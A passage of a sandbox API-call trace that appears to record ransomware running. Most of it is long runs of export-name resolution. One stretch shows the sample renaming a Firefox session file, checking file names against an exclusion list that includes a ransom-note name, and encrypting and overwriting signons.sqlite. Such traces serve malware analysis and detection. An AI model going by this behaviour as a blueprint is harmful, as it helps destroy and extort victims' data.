(lpString="DELETEFILETRANSACTEDW") returned 21 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.118] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.118] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.118] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.118] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.118] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.118] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.118] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.118] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.118] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.118] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.118] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.118] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.118] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.118] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.118] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.118] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.118] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.119] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.119] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.119] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.119] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.119] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.119] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.119] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.119] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.119] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.119] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.119] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.119] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.119] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.119] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.119] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.119] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.119] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.119] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.120] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.120] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 103 [0082.120] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.ZUeQ9Er") returned 111 [0082.120] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js.ZUeQ9Er" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js.zueq9er"), dwFlags=0x0) returned 1 [0082.120] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.121] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.121] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.121] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6f36850, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x50000, dwReserved0=0x0, dwReserved1=0x0, cFileName="signons.sqlite", cAlternateFileName="SIGNON~1.SQL")) returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="DECRYPT-FILES.txt") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="autorun.inf") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="boot.ini") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="desktop.ini") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="ntuser.dat") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="iconcache.db") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="bootsect.bak") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="ntuser.dat.log") returned 1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="thumbs.db") returned -1 [0082.121] lstrcmpiW (lpString1="signons.sqlite", lpString2="Bootfont.bin") returned 1 [0082.121] lstrlenW (lpString="signons.sqlite") returned 14 [0082.121] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0082.121] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0082.121] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0082.121] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0082.121] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.121] lstrlenW (lpString="signons.sqlite") returned 14 [0082.122] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.122] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="signons.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" [0082.122] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.122] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=327680) returned 1 [0082.122] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.122] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x12a0000 [0082.123] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.123] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.123] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.125] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.125] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.133] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.134] UnmapViewOfFile (lpBaseAddress=0x12a0000) returned 1 [0082.137] CloseHandle (hObject=0x464) returned 1 [0082.137] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.137] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.138] CloseHandle (hObject=0x0) returned 0 [0082.138] CloseHandle (hObject=0x460) returned 1 [0082.138] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.138] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.138] GetTickCount () returned 0x114d02b [0082.138] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.138] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.138] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.139] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.139] lstrlenA (lpString="kernel32.dll") returned 12 [0082.139] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.139] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.139] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.139] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.139] lstrlenA (lpString="ADDATOMA") returned 8 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.139] lstrlenA (lpString="ADDATOMW") returned 8 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.139] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.139] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.140] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.140] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.140] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.140] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.140] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.140] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.140] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.140] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.140] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.140] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.140] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.140] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.140] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.140] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.140] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.140] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.140] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.140] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.140] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.141] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.141] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.141] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.141] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.141] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.141] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.141] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.141] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.141] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.141] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.141] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.141] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.141] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.141] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.141] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.141] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.141] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.141] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.142] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.142] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.142] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.142] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.142] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.142] lstrcpyA (in: 